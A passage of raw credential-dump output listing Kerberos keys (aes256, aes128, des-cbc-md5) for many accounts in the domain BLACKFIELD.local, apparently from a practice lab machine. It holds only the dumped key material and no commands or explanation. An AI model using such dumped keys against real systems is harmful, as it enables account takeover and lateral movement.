            BLACKFIELD.local\BLACKFIELD441759:aes128-cts-hmac-sha1-96:d9fa80bab869030191f6e04c227808db
            BLACKFIELD.local\BLACKFIELD441759:des-cbc-md5:d57954e3bfab515e
            BLACKFIELD.local\BLACKFIELD763893:aes256-cts-hmac-sha1-96:7e4757509f7b03e547b830c3823906af81f3d2c4a10b33d837740d5a1e58aeb5
            BLACKFIELD.local\BLACKFIELD763893:aes128-cts-hmac-sha1-96:2dc4e4477fd5a511fccfd89e7a58b602
            BLACKFIELD.local\BLACKFIELD763893:des-cbc-md5:46ab3edfcd0d3e37
            BLACKFIELD.local\BLACKFIELD713470:aes256-cts-hmac-sha1-96:5d77643162eed1342888f4c3c72bf464cfa30f8ce45e6ae5d46c84279f660dd4
            BLACKFIELD.local\BLACKFIELD713470:aes128-cts-hmac-sha1-96:066639e00e45ee5e849d37a270834d8b
            BLACKFIELD.local\BLACKFIELD713470:des-cbc-md5:6d4002924a79fe98
            BLACKFIELD.local\BLACKFIELD131771:aes256-cts-hmac-sha1-96:6b81eb7701fd17ecdbbf2610cd7740f92ef959890802b4b9ec2fe2a99563bc8b
            BLACKFIELD.local\BLACKFIELD131771:aes128-cts-hmac-sha1-96:f50a77d5f6ca5e8a618e4cef5a4bbfa7
            BLACKFIELD.local\BLACKFIELD131771:des-cbc-md5:5eb01ad38645e561
            BLACKFIELD.local\BLACKFIELD793029:aes256-cts-hmac-sha1-96:69cfb3ac2210174671ddcbf61a995cbd1d4a0a45766d1cfc14cd29fd2675b166
            BLACKFIELD.local\BLACKFIELD793029:aes128-cts-hmac-sha1-96:36b5f53ccc9e8767875547655932e34b
            BLACKFIELD.local\BLACKFIELD793029:des-cbc-md5:fbe6da3d31ec7554
            BLACKFIELD.local\BLACKFIELD694429:aes256-cts-hmac-sha1-96:b8da81abb3b4abaa1e36e4355d276fe38c878f80baf15d5461f940bd6e0e1da7
            BLACKFIELD.local\BLACKFIELD694429:aes128-cts-hmac-sha1-96:21d31e77c87bb5ea91902712b47ed2a5
            BLACKFIELD.local\BLACKFIELD694429:des-cbc-md5:689e0d8c02731615
            BLACKFIELD.local\BLACKFIELD802251:aes256-cts-hmac-sha1-96:efb519f29f7a8ca3931e3db1e1ada28fbb291513e6d88c90a030670fd01cf88e
            BLACKFIELD.local\BLACKFIELD802251:aes128-cts-hmac-sha1-96:23a6121d7d674e4727daf2fc5f9884a2
            BLACKFIELD.local\BLACKFIELD802251:des-cbc-md5:8979c4f7ba735ebf
            BLACKFIELD.local\BLACKFIELD602567:aes256-cts-hmac-sha1-96:a5bdc59e102b3090560b333e5884854bcd82582e291b178a2927946be2a4b58f
            BLACKFIELD.local\BLACKFIELD602567:aes128-cts-hmac-sha1-96:13dde7c75518b9bcc6cd12bc9041d190
            BLACKFIELD.local\BLACKFIELD602567:des-cbc-md5:677c8f7645ae43fd
            BLACKFIELD.local\BLACKFIELD328983:aes256-cts-hmac-sha1-96:492fa94e927f72ae117b42cddbd497dd01fdfc31659b4afdeb8f4d70c0212c68
            BLACKFIELD.local\BLACKFIELD328983:aes128-cts-hmac-sha1-96:4856e6c259066ac4451ee9a0d0f4546c
            BLACKFIELD.local\BLACKFIELD328983:des-cbc-md5:d6d9c220292ac75b
            BLACKFIELD.local\BLACKFIELD990638:aes256-cts-hmac-sha1-96:ae39d95053b4e758ed08684ba253ced28a04ef2c8350cdad851b8ca32536932d
            BLACKFIELD.local\BLACKFIELD990638:aes128-cts-hmac-sha1-96:945f4edb3c721aeaeee8d9d6fe70d5d1
            BLACKFIELD.local\BLACKFIELD990638:des-cbc-md5:237032fdf4852c98
            BLACKFIELD.local\BLACKFIELD350809:aes256-cts-hmac-sha1-96:c4122fe9c83fce2a9c9d4c183a181d90d8117fa9dd553ba394dd10650f79ecd3
            BLACKFIELD.local\BLACKFIELD350809:aes128-cts-hmac-sha1-96:d9363a9033c1e91fd2f5ac2ff2c91366
            BLACKFIELD.local\BLACKFIELD350809:des-cbc-md5:fd2515fea4f87f9b
            BLACKFIELD.local\BLACKFIELD405242:aes256-cts-hmac-sha1-96:28322d95a87e2ad8b27bb1610adb96f531eb9a8244198b8fb277a2ac553c4004
            BLACKFIELD.local\BLACKFIELD405242:aes128-cts-hmac-sha1-96:76dcc3e44ca75d30f24ef90df2ffc060
            BLACKFIELD.local\BLACKFIELD405242:des-cbc-md5:23c7ecfbc1cd3b8f
            BLACKFIELD.local\BLACKFIELD267457:aes256-cts-hmac-sha1-96:e1c380b060863f9fc801b89fc4f78ab0c5ffda60657192ce07255f54409cb004
            BLACKFIELD.local\BLACKFIELD267457:aes128-cts-hmac-sha1-96:8bdbf2c260adf57d83b71d62a8c4942d
            BLACKFIELD.local\BLACKFIELD267457:des-cbc-md5:79ce196decfe973d
            BLACKFIELD.local\BLACKFIELD686428:aes256-cts-hmac-sha1-96:b426ca516170b7dd46ec6f67f8ec44c369b32271520394cf931594b2d3d9f031
            BLACKFIELD.local\BLACKFIELD686428:aes128-cts-hmac-sha1-96:f9a07bf777e91525957ed902cd08e532
            BLACKFIELD.local\BLACKFIELD686428:des-cbc-md5:37dc493e51e394cd
            BLACKFIELD.local\BLACKFIELD478828:aes256-cts-hmac-sha1-96:c28bc3080ecffb758903edc1ed87f6015e40359550a3eacfeb301c287d89814f
            BLACKFIELD.local\BLACKFIELD478828:aes128-cts-hmac-sha1-96:a95011b25badb404d879ce22ba505551
            BLACKFIELD.local\BLACKFIELD478828:des-cbc-md5:3edccda725e99b07
            BLACKFIELD.local\BLACKFIELD129387:aes256-cts-hmac-sha1-96:2087ffa18aa4ea2e7b2cb1ed10b242489380dfa09d8049a73a20a5585b93155a
            BLACKFIELD.local\BLACKFIELD129387:aes128-cts-hmac-sha1-96:b024485bd56988fadfcb9e1d17ef3e20
            BLACKFIELD.local\BLACKFIELD129387:des-cbc-md5:790dda8c4c91d31c
            BLACKFIELD.local\BLACKFIELD544934:aes256-cts-hmac-sha1-96:9e2da9fa21d1fbc0fa09b3f6e52a19033ee0b4a86f50cc4302f29c24324943ad
            BLACKFIELD.local\BLACKFIELD544934:aes128-cts-hmac-sha1-96:bc00097310cfce49964aacab411680f5
            BLACKFIELD.local\BLACKFIELD544934:des-cbc-md5:62bcc42585ce3dfe
            BLACKFIELD.local\BLACKFIELD115148:aes256-cts-hmac-sha1-96:71df07813ca5bd80a35d3b36385e4043f48fafa65aa12bf1ae74d8418ed94d6f
            BLACKFIELD.local\BLACKFIELD115148:aes128-cts-hmac-sha1-96:624f12b3cc80c50375ccfbf1bb6c2426
            BLACKFIELD.local\BLACKFIELD115148:des-cbc-md5:31c4fefb5ba71057
            BLACKFIELD.local\BLACKFIELD753537:aes256-cts-hmac-sha1-96:8741de9864943a66111d45dba915e7cb9fe9b214932fccb7200c696b745a6daf
            BLACKFIELD.local\BLACKFIELD753537:aes128-cts-hmac-sha1-96:f00bbf38dadc3540ba767b32464a3d90
            BLACKFIELD.local\BLACKFIELD753537:des-cbc-md5:97e510b5a252c715
            BLACKFIELD.local\BLACKFIELD416532:aes256-cts-hmac-sha1-96:a4268c8711f40c89254a9b388200c26bcbf93b94ff07fcaefbfadec3df578fe0
            BLACKFIELD.local\BLACKFIELD416532:aes128-cts-hmac-sha1-96:cc637fee410a14e9b5baa5b4142b1a89
            BLACKFIELD.local\BLACKFIELD416532:des-cbc-md5:19266bb3b5e59bab
            BLACKFIELD.local\BLACKFIELD680939:aes256-cts-hmac-sha1-96:5a5e69d5e0dcf879181bc16e11d7b4415d0a02a9fd375108636c8348bbabe21b
            BLACKFIELD.local\BLACKFIELD680939:aes128-cts-hmac-sha1-96:79d6d9c427f29b2676d241cd9e4599ba
            BLACKFIELD.local\BLACKFIELD680939:des-cbc-md5:13f45b318cf1681f
            BLACKFIELD.local\BLACKFIELD732035:aes256-cts-hmac-sha1-96:b1dde0c3a9f8ab45f3da67fd2fa46108632a51df727c8d620326f4e123ed24bf
            BLACKFIELD.local\BLACKFIELD732035:aes128-cts-hmac-sha1-96:0a598917405702bbdd14b6cf3111dd9f
            BLACKFIELD.local\BLACKFIELD732035:des-cbc-md5:b5c27a1c64648940
            BLACKFIELD.local\BLACKFIELD522135:aes256-cts-hmac-sha1-96:7b936efefa9123627703bf6b30ba9a83fe04917dc01997e6afa8722d087d6baf
            BLACKFIELD.local\BLACKFIELD522135:aes128-cts-hmac-sha1-96:d437affeab68cdd7e9f9f0c9cd6ba2a6
            BLACKFIELD.local\BLACKFIELD522135:des-cbc-md5:b0324f8f107ad55b
            BLACKFIELD.local\BLACKFIELD773423:aes256-cts-hmac-sha1-96:f65ef03e3278ce406bd944bf5b802124a9a2e3193d99e28ad30819328da60d0a
            BLACKFIELD.local\BLACKFIELD773423:aes128-cts-hmac-sha1-96:a9c9eaef839af4a7d20f7a9d7fe89ed0
            BLACKFIELD.local\BLACKFIELD773423:des-cbc-md5:5e38c2948040aedc
            BLACKFIELD.local\BLACKFIELD371669:aes256-cts-hmac-sha1-96:bcda6286750ef46186fd43a30f39346d16c79f528c4f9cef66b4b39df75935c2
            BLACKFIELD.local\BLACKFIELD371669:aes128-cts-hmac-sha1-96:c061d280a6120cf0ca743164f3e01235
            BLACKFIELD.local\BLACKFIELD371669:des-cbc-md5:7ac808e0d004d686
            BLACKFIELD.local\BLACKFIELD252379:aes256-cts-hmac-sha1-96:13d11377191a719a5e8bdef313e030f203685ac6c11e6f460c2b46c228d6d6d9
            BLACKFIELD.local\BLACKFIELD252379:aes128-cts-hmac-sha1-96:d91e3543c1de0bb1505a6964ea9749dd
            BLACKFIELD.local\BLACKFIELD252379:des-cbc-md5:c1c45dc749fd8fd6
            BLACKFIELD.local\BLACKFIELD828826:aes256-cts-hmac-sha1-96:54a2f628430a073c6e1455754f810efbc7f2294bc5754490d4242a5cebf70b1d
            BLACKFIELD.local\BLACKFIELD828826:aes128-cts-hmac-sha1-96:ecc198b6bf63881f14e09b12986ff613
            BLACKFIELD.local\BLACKFIELD828826:des-cbc-md5:1592a83d6bf87c73
            BLACKFIELD.local\BLACKFIELD548394:aes256-cts-hmac-sha1-96:7de548d16e91dd0ed8f777cda51f1b370537c29964bf059ff8e5f8015c3cd11b
            BLACKFIELD.local\BLACKFIELD548394:aes128-cts-hmac-sha1-96:4c3b8163c0c764ed7ad108e1571a7204
            BLACKFIELD.local\BLACKFIELD548394:des-cbc-md5:57fb0232b325989b
            BLACKFIELD.local\BLACKFIELD611993:aes256-cts-hmac-sha1-96:a3ed6b8dacca3d15722ed9ff353e5fba301266d854df6dbb50ca11ea4e941080
            BLACKFIELD.local\BLACKFIELD611993:aes128-cts-hmac-sha1-96:13b778553e4663c6d5605b91191ec684
            BLACKFIELD.local\BLACKFIELD611993:des-cbc-md5:9b86ef679e10f84c
            BLACKFIELD.local\BLACKFIELD192642:aes256-cts-hmac-sha1-96:4e8f3a7081de9aafb9d7615e86a9ffa9efb490e8748f98df740744174a700350
            BLACKFIELD.local\BLACKFIELD192642:aes128-cts-hmac-sha1-96:e91c4286462e4d5915994e5ece8f8b3a
            BLACKFIELD.local\BLACKFIELD192642:des-cbc-md5:e5c8f732d0ae3889
            BLACKFIELD.local\BLACKFIELD106360:aes256-cts-hmac-sha1-96:f7507c9663ec42b8311c239063cafe0d5620e6e3ca3b8bc3e63b44ab2e9380ec
            BLACKFIELD.local\BLACKFIELD106360:aes128-cts-hmac-sha1-96:8c44debe0999c3a12acc9f6356d2c1d5
            BLACKFIELD.local\BLACKFIELD106360:des-cbc-md5:3ec861bf64eae349
            BLACKFIELD.local\BLACKFIELD939243:aes256-cts-hmac-sha1-96:bde4ccd24419ed3a18bb58db834b15b73b7588a62b388fe64ffbf498256913a7
            BLACKFIELD.local\BLACKFIELD939243:aes128-cts-hmac-sha1-96:f753eb37e09d76505e2c51e37cb7d72b
            BLACKFIELD.local\BLACKFIELD939243:des-cbc-md5:80e62f25b0fd73e3
            BLACKFIELD.local\BLACKFIELD230515:aes256-cts-hmac-sha1-96:058431a411641e5f5df02055ee3b53a08fe19e4a473fab546c4166e90d9fb9ae
            BLACKFIELD.local\BLACKFIELD230515:aes128-cts-hmac-sha1-96:cd522fb7e5d588894d3b187b5e28bf0d
            BLACKFIELD.local\BLACKFIELD230515:des-cbc-md5:46fb2c3b38c8432f
            BLACKFIELD.local\BLACKFIELD774376:aes256-cts-hmac-sha1-96:8230c6413aba8ccd3a69c949bb584f95f0f3294fca39f08c07e883acc88d6041
            BLACKFIELD.local\BLACKFIELD774376:aes128-cts-hmac-sha1-96:6788256a5310c35fa2583fa5834fa421
            BLACKFIELD.local\BLACKFIELD774376:des-cbc-md5:fe38e98a0819c404
            BLACKFIELD.local\BLACKFIELD576233:aes256-cts-hmac-sha1-96:2084d4da98a0d36a261dd76d5d06b69ebe67ca8f9a71195b1877c41ca8341557
            BLACKFIELD.local\BLACKFIELD576233:aes128-cts-hmac-sha1-96:f3b5197d6b70daeaba0063cddcb1f7bc
            BLACKFIELD.local\BLACKFIELD576233:des-cbc-md5:8f7929c1735449fb
            BLACKFIELD.local\BLACKFIELD676303:aes256-cts-hmac-sha1-96:748bcb5b690afd662ed6d6e6300d56e8c509d8f2d39b16afdbd8da7b11a2f6c2
            BLACKFIELD.local\BLACKFIELD676303:aes128-cts-hmac-sha1-96:5736a53d5572121d6f844b0980c64d06
            BLACKFIELD.local\BLACKFIELD676303:des-cbc-md5:f81a5b761f1f6e89
            BLACKFIELD.local\BLACKFIELD673073:aes256-cts-hmac-sha1-96:d2bbcf107afe17e6986a0bb1b4e3734aa879584030ccb770c9acc0865681c0b6
            BLACKFIELD.local\BLACKFIELD673073:aes128-cts-hmac-sha1-96:d1687f08a037ab7dcab9a0b9d50f5c51
            BLACKFIELD.local\BLACKFIELD673073:des-cbc-md5:67970e3e863bd6b5
            BLACKFIELD.local\BLACKFIELD558867:aes256-cts-hmac-sha1-96:9713721b865da7dbe25df3e6c67211b499779f5a5d003c840157a49a762b99e7
            BLACKFIELD.local\BLACKFIELD558867:aes128-cts-hmac-sha1-96:8ce14e1417fae9987fdff7c8673b900a
            BLACKFIELD.local\BLACKFIELD558867:des-cbc-md5:92c2e55894798af1
            BLACKFIELD.local\BLACKFIELD184482:aes256-cts-hmac-sha1-96:79aaebb5ef7937c3f4a9d7579f156ecce7cff6904c062f46d850ed3bd9bc7705
            BLACKFIELD.local\BLACKFIELD184482:aes128-cts-hmac-sha1-96:d70a1b86c80a29c3291093dd555d8505
            BLACKFIELD.local\BLACKFIELD184482:des-cbc-md5:380d5d7c25ad8579
            BLACKFIELD.local\BLACKFIELD724669:aes256-cts-hmac-sha1-96:47fd86fc8d2a239e3c891ac51f0fb085240284edd6c87074a16987b4e9b70531
            BLACKFIELD.local\BLACKFIELD724669:aes128-cts-hmac-sha1-96:4da2eb7e2f5bd8b37b4861dfe8805c0b
            BLACKFIELD.local\BLACKFIELD724669:des-cbc-md5:8962439ba7025be3
            BLACKFIELD.local\BLACKFIELD765350:aes256-cts-hmac-sha1-96:ef820e3f9ff13de24abbe5499acfd65328b58b22b42a769afd01a38cce5eb8d4
            BLACKFIELD.local\BLACKFIELD765350:aes128-cts-hmac-sha1-96:f5e6677903115096a6674acf41ee024a
            BLACKFIELD.local\BLACKFIELD765350:des-cbc-md5:2579ecba94b592d6
            BLACKFIELD.local\BLACKFIELD411132:aes256-cts-hmac-sha1-96:499d7e4ae759ee61c9684e728387e2b720f9e4491e50f2d4e459956d12675daa
            BLACKFIELD.local\BLACKFIELD411132:aes128-cts-hmac-sha1-96:b564c54c0edf23b68d72da755afe2834
            BLACKFIELD.local\BLACKFIELD411132:des-cbc-md5:6e04d031d94a62cd
            BLACKFIELD.local\BLACKFIELD128775:aes256-cts-hmac-sha1-96:b3285e1422cc95613e958afcf6e847cad5f43a80fdcb1e8c81c6b94d008424cb
            BLACKFIELD.local\BLACKFIELD128775:aes128-cts-hmac-sha1-96:1f2bc24ff034af1fa74569770683c7f1
            BLACKFIELD.local\BLACKFIELD128775:des-cbc-md5:9b32b6e63bf7b662
            BLACKFIELD.local\BLACKFIELD704154:aes256-cts-hmac-sha1-96:6221511e5a1446b3f4e1de98f6ca71b092d344dc4b9665163b45f5aa40b98c55
            BLACKFIELD.local\BLACKFIELD704154:aes128-cts-hmac-sha1-96:6d06e55adf262006d7736fd723a85e78
            BLACKFIELD.local\BLACKFIELD704154:des-cbc-md5:732c29a7291fcbef
            BLACKFIELD.local\BLACKFIELD107197:aes256-cts-hmac-sha1-96:ef7ca20ad1e80a2df38f25899331897b4bf88ae68a15c932be0e38ca5c2ab529
            BLACKFIELD.local\BLACKFIELD107197:aes128-cts-hmac-sha1-96:7d6a82cd07260f786bc643aaef00cca1
            BLACKFIELD.local\BLACKFIELD107197:des-cbc-md5:0d6b4ce070c45262
            BLACKFIELD.local\BLACKFIELD994577:aes256-cts-hmac-sha1-96:3b7fefb191c96b5efc5bde78afc05ed38d13c1cf21d8f8ca92157b77b807c741
            BLACKFIELD.local\BLACKFIELD994577:aes128-cts-hmac-sha1-96:0b08da8d2347031351705d58ae42f8ba
            BLACKFIELD.local\BLACKFIELD994577:des-cbc-md5:296e70d679c70db0
            BLACKFIELD.local\BLACKFIELD683323:aes256-cts-hmac-sha1-96:0f898af013da00bbd1f0022da1d3daa650da69baa26dc75268070800f8c21f76
            BLACKFIELD.local\BLACKFIELD683323:aes128-cts-hmac-sha1-96:2f8495fa00075d5ebcda180eb62e0a0a
            BLACKFIELD.local\BLACKFIELD683323:des-cbc-md5:0df86b46491ff292
            BLACKFIELD.local\BLACKFIELD433476:aes256-cts-hmac-sha1-96:b76a4369aee258f56b65d6b957b38328a6ad089442110ac6b8066e0973753ba1
            BLACKFIELD.local\BLACKFIELD433476:aes128-cts-hmac-sha1-96:07f2e727d3079c45a76d31d83ff8b64d
            BLACKFIELD.local\BLACKFIELD433476:des-cbc-md5:7c49fbc8c737678a
            BLACKFIELD.local\BLACKFIELD644281:aes256-cts-hmac-sha1-96:d72eddea568edbeb454f2be9ce65445b3efb16d2b2d6e0157c091b4ce55e5d22
            BLACKFIELD.local\BLACKFIELD644281:aes128-cts-hmac-sha1-96:f5ff8460d41d1aa2685b541fc04f2c6b
            BLACKFIELD.local\BLACKFIELD644281:des-cbc-md5:a7e6237acba19476
            BLACKFIELD.local\BLACKFIELD195953:aes256-cts-hmac-sha1-96:3010b31298fbbe8e8b203e6b3bc2bea17cd956872355f73a0da621514219eee3
            BLACKFIELD.local\BLACKFIELD195953:aes128-cts-hmac-sha1-96:f2ce29b92eb4067f11e4fe2986cd7704
            BLACKFIELD.local\BLACKFIELD195953:des-cbc-md5:c449ae8310254c97
            BLACKFIELD.local\BLACKFIELD868068:aes256-cts-hmac-sha1-96:19132ad7ec20b6377cbf7568da9e7a84a76bcd83f6d713246852161184ad3a43
            BLACKFIELD.local\BLACKFIELD868068:aes128-cts-hmac-sha1-96:9ec1bd48da16c41f4baf5d823d973519
            BLACKFIELD.local\BLACKFIELD868068:des-cbc-md5:1a0b074601ba7a5e
            BLACKFIELD.local\BLACKFIELD690642:aes256-cts-hmac-sha1-96:47a24ca5c8d3ffd86ebb5f28aa10f99e29f83e1fd9cf9dc6f265b3f0603f84fc
            BLACKFIELD.local\BLACKFIELD690642:aes128-cts-hmac-sha1-96:3877b44d7bbbd46c57ae6a1a089b584e
            BLACKFIELD.local\BLACKFIELD690642:des-cbc-md5:a752b39d8a5e04b9
            BLACKFIELD.local\BLACKFIELD465267:aes256-cts-hmac-sha1-96:90a0dabc4a04f4cf1e16b831ab02062c1acfe93d040ef26840a68b08cc595772
            BLACKFIELD.local\BLACKFIELD465267:aes128-cts-hmac-sha1-96:12f6d5350d7a78c6e04c5e18dafd67b1
            BLACKFIELD.local\BLACKFIELD465267:des-cbc-md5:92262f3473ba6d5b
            BLACKFIELD.local\BLACKFIELD199889:aes256-cts-hmac-sha1-96:deedfbf83ec308a9db55cfb0631a59a000eb32e60e7feb76b27d43836fb8bb5b
            BLACKFIELD.local\BLACKFIELD199889:aes128-cts-hmac-sha1-96:c4cc27c18bacce62f84286c69f3bded2
            BLACKFIELD.local\BLACKFIELD199889:des-cbc-md5:7958a7ab43d05425
            BLACKFIELD.local\BLACKFIELD468839:aes256-cts-hmac-sha1-96:88ca3fd0cfcb034372ccae17abbf6219933df0052bcb3170adb2fae46f3238bd
            BLACKFIELD.local\BLACKFIELD468839:aes128-cts-hmac-sha1-96:2072f9d9920c4926668b62f24800e9ea
            BLACKFIELD.local\BLACKFIELD468839:des-cbc-md5:a7f8629eec6d2945
            BLACKFIELD.local\BLACKFIELD348835:aes256-cts-hmac-sha1-96:bbf63e34145c2cc4532aa9cffd0e3746dfb531ec3805735ed5887ad27b4bebb2
            BLACKFIELD.local\BLACKFIELD348835:aes128-cts-hmac-sha1-96:1b92976d49201c5ce95d28aa8e405557
            BLACKFIELD.local\BLACKFIELD348835:des-cbc-md5:a2d35d80794c077c
            BLACKFIELD.local\BLACKFIELD624385:aes256-cts-hmac-sha1-96:5fabe43235ba5c2717aa4461ce46c7beeec779908479d11af49a82a071c0cf02
            BLACKFIELD.local\BLACKFIELD624385:aes128-cts-hmac-sha1-96:d77bd10c351d1e17e3d0140871744af4
            BLACKFIELD.local\BLACKFIELD624385:des-cbc-md5:cef8a4bc01a4c7d5
            BLACKFIELD.local\BLACKFIELD818863:aes256-cts-hmac-sha1-96:0c723291aaa1ff93ce05853ee4e51aba484a68d462075535a6e74f6b09caa415
            BLACKFIELD.local\BLACKFIELD818863:aes128-cts-hmac-sha1-96:cdf15a9428fb024a264c055bfe665bf3
            BLACKFIELD.local\BLACKFIELD818863:des-cbc-md5:151f020438e386e0
            BLACKFIELD.local\BLACKFIELD939200:aes256-cts-hmac-sha1-96:593ffa0956ff1e19a1942e6f127c3d19f1992d2d3553de5ca2e54fff06a58998
            BLACKFIELD.local\BLACKFIELD939200:aes128-cts-hmac-sha1-96:4d66c4451372b0828ab5a8a8ed92c333
            BLACKFIELD.local\BLACKFIELD939200:des-cbc-md5:d3c22a7658b03134
            BLACKFIELD.local\BLACKFIELD135990:aes256-cts-hmac-sha1-96:096034d2dfa3d2851f593a823d1480cc01e2d4460965f55245028137ec7681b8
            BLACKFIELD.local\BLACKFIELD135990:aes128-cts-hmac-sha1-96:327bc791ca01ffcf37d347975f77241f
            BLACKFIELD.local\BLACKFIELD135990:des-cbc-md5:b69b3786dfdc5880
            BLACKFIELD.local\BLACKFIELD484290:aes256-cts-hmac-sha1-96:7e1bd5ce58d0de57a61b443ae1e8a57ffb5c17534b3e9d314c921d5816e7a5cd
            BLACKFIELD.local\BLACKFIELD484290:aes128-cts-hmac-sha1-96:53ef48aef74a669cae5d6b2a02ca3e73
            BLACKFIELD.local\BLACKFIELD484290:des-cbc-md5:f737624625c77079
            BLACKFIELD.local\BLACKFIELD898237:aes256-cts-hmac-sha1-96:c385065eb7d502870be6223ef57e21e75b7b299397e7e54f7f3b64f3cbb76ae6
            BLACKFIELD.local\BLACKFIELD898237:aes128-cts-hmac-sha1-96:48d5669365c297cb3850e2ebb93817a6
            BLACKFIELD.local\BLACKFIELD898237:des-cbc-md5:255bb95b4092ec79
            BLACKFIELD.local\BLACKFIELD773118:aes256-cts-hmac-sha1-96:89ccd0d8967e74cfc08d3e0de7e2fe708eeed32df0f4633b9460af16c696c486
            BLACKFIELD.local\BLACKFIELD773118:aes128-cts-hmac-sha1-96:3824008c096ba9be8068873243294032
            BLACKFIELD.local\BLACKFIELD773118:des-cbc-md5:4fe9da86d3bf9b61
            BLACKFIELD.local\BLACKFIELD148067:aes256-cts-hmac-sha1-96:7eea9ba3180264897069268f24b46fb5da6437edbf50e7d62ca5409b5143d76e
            BLACKFIELD.local\BLACKFIELD148067:aes128-cts-hmac-sha1-96:c624234341876a99dc41829d4af61718
            BLACKFIELD.local\BLACKFIELD148067:des-cbc-md5:31a107bff4abeac2
            BLACKFIELD.local\BLACKFIELD390179:aes256-cts-hmac-sha1-96:59363d53bb27e9f85237b1a3a935002a3cd9a3c4cd8f80c89af9a750c27ae9fb
            BLACKFIELD.local\BLACKFIELD390179:aes128-cts-hmac-sha1-96:14811bbcde924a0df0d5c832aca7e6a8
            BLACKFIELD.local\BLACKFIELD390179:des-cbc-md5:0e6e67e0a46e6d46
            BLACKFIELD.local\BLACKFIELD359278:aes256-cts-hmac-sha1-96:464989543ae9aa6b144d54aa83636f67216b5d4bba8c64fdb40ba1600e6b0d12
            BLACKFIELD.local\BLACKFIELD359278:aes128-cts-hmac-sha1-96:aeb61a28047a11f46533552a6749c482
            BLACKFIELD.local\BLACKFIELD359278:des-cbc-md5:6d04f164dc02a1f1
            BLACKFIELD.local\BLACKFIELD375924:aes256-cts-hmac-sha1-96:ab931de0f8c2ce7fbb78138844e3afac74f86c08c5710dabe8a083fc67f2c866
            BLACKFIELD.local\BLACKFIELD375924:aes128-cts-hmac-sha1-96:f80f6a782a5dfde7bf11e77624dafe41
            BLACKFIELD.local\BLACKFIELD375924:des-cbc-md5:2af84037a738587a
            BLACKFIELD.local\BLACKFIELD533060:aes256-cts-hmac-sha1-96:53531f28da6c5131319e18ab3a358c7eea6171146dd9e0dda293632de130c2b0
            BLACKFIELD.local\BLACKFIELD533060:aes128-cts-hmac-sha1-96:95af01ad2ba32cc974416e8f1971aa70
            BLACKFIELD.local\BLACKFIELD533060:des-cbc-md5:e367983ecd6786dc
            BLACKFIELD.local\BLACKFIELD534196:aes256-cts-hmac-sha1-96:06d2f217873b1c054554ee825e00eb858f343e24e131ec36f6de590139ded2de
            BLACKFIELD.local\BLACKFIELD534196:aes128-cts-hmac-sha1-96:c2ea6532e49e3acbf6876277cf4bf0df
            BLACKFIELD.local\BLACKFIELD534196:des-cbc-md5:fec8f454df1c4938
            BLACKFIELD.local\BLACKFIELD639103:aes256-cts-hmac-sha1-96:39b2a7584da778de2e439a263b4566964224b1d60c93e427a91e6315f4e30dcf
            BLACKFIELD.local\BLACKFIELD639103:aes128-cts-hmac-sha1-96:95f63aa7ad6ec21e3071d2495bcb010b
            BLACKFIELD.local\BLACKFIELD639103:des-cbc-md5:3b7cd025adb397d0
            BLACKFIELD.local\BLACKFIELD933887:aes256-cts-hmac-sha1-96:fc5bd1b76eb045f23c40f40346c81e2981c69858e60a3b05208be7f8162118e0
            BLACKFIELD.local\BLACKFIELD933887:aes128-cts-hmac-sha1-96:fe1165f3242776c4b82d29aecd0649c3
            BLACKFIELD.local\BLACKFIELD933887:des-cbc-md5:26fe23cd85b03be3
            BLACKFIELD.local\BLACKFIELD907614:aes256-cts-hmac-sha1-96:7b01627b0eb77bfe191b14e07e5a2ee7e9e6e92af3d547302c260e9986803e88
            BLACKFIELD.local\BLACKFIELD907614:aes128-cts-hmac-sha1-96:c3de6bdc596f6030633886ef21c2c136
            BLACKFIELD.local\BLACKFIELD907614:des-cbc-md5:8f58efe958c12f07
            BLACKFIELD.local\BLACKFIELD991588:aes256-cts-hmac-sha1-96:473315a76205f651135fb53ce0ad0adf455e959fe87b85e758db250d5312f1a1
            BLACKFIELD.local\BLACKFIELD991588:aes128-cts-hmac-sha1-96:b2cb34c6c307aef6116e3d27aa050953
            BLACKFIELD.local\BLACKFIELD991588:des-cbc-md5:3298ab0e46abbfce
            BLACKFIELD.local\BLACKFIELD781404:aes256-cts-hmac-sha1-96:584197b8f77025c25201015e31bfad077a5d3108db5ec17214836717c3a0f7d9
            BLACKFIELD.local\BLACKFIELD781404:aes128-cts-hmac-sha1-96:24139c29132041c4b596598346ff374b
            BLACKFIELD.local\BLACKFIELD781404:des-cbc-md5:3e6851c4ef349bfb
            BLACKFIELD.local\BLACKFIELD787995:aes256-cts-hmac-sha1-96:7b1c5918528ef38fe0ecc316e453ad817e63c251c770452aa14c9f4a36ff9c16
            BLACKFIELD.local\BLACKFIELD787995:aes128-cts-hmac-sha1-96:b7d4655b9b7fc27619e5679b65ba013a
            BLACKFIELD.local\BLACKFIELD787995:des-cbc-md5:92295e9da154b03d
            BLACKFIELD.local\BLACKFIELD911926:aes256-cts-hmac-sha1-96:1f3961aab6b9e4b2b6676dace2db1c61af3b3f950f0859c24b8e1820ea39e571
            BLACKFIELD.local\BLACKFIELD911926:aes128-cts-hmac-sha1-96:5cffaa0374c89eabbc2c9b5a07fbf89d
            BLACKFIELD.local\BLACKFIELD911926:des-cbc-md5:16e5ecf88945764a
            BLACKFIELD.local\BLACKFIELD146200:aes256-cts-hmac-sha1-96:070442465aee7b75ede6277318481afd27188cd428c7ae489d11137eeacfdb5a
            BLACKFIELD.local\BLACKFIELD146200:aes128-cts-hmac-sha1-96:3359158ae15b3e8711ca277ce8a178f1
            BLACKFIELD.local\BLACKFIELD146200:des-cbc-md5:5e4ff1adb99bbccd
            BLACKFIELD.local\BLACKFIELD826622:aes256-cts-hmac-sha1-96:50137030c2d8379d19c2cc0d4549a328d8143916e22b01f91be8d853613e1366
            BLACKFIELD.local\BLACKFIELD826622:aes128-cts-hmac-sha1-96:e41d6d98170c83401b76c68229468978
            BLACKFIELD.local\BLACKFIELD826622:des-cbc-md5:b0f2194a68498354
            BLACKFIELD.local\BLACKFIELD171624:aes256-cts-hmac-sha1-96:84b13617eac0c6a780ef318a2795c3544a59c6577a97a3575b40fd09b0928dc5
            BLACKFIELD.local\BLACKFIELD171624:aes128-cts-hmac-sha1-96:ee758bbc9975f4d11cf9f43188b8790a
            BLACKFIELD.local\BLACKFIELD171624:des-cbc-md5:150b58baa251aee9
            BLACKFIELD.local\BLACKFIELD497216:aes256-cts-hmac-sha1-96:aa907336935ace1223c94e5f490d6639288348bc9e879e4035498b1f141d33b1
            BLACKFIELD.local\BLACKFIELD497216:aes128-cts-hmac-sha1-96:86813c444cc56687eac4e08e1bf47a73
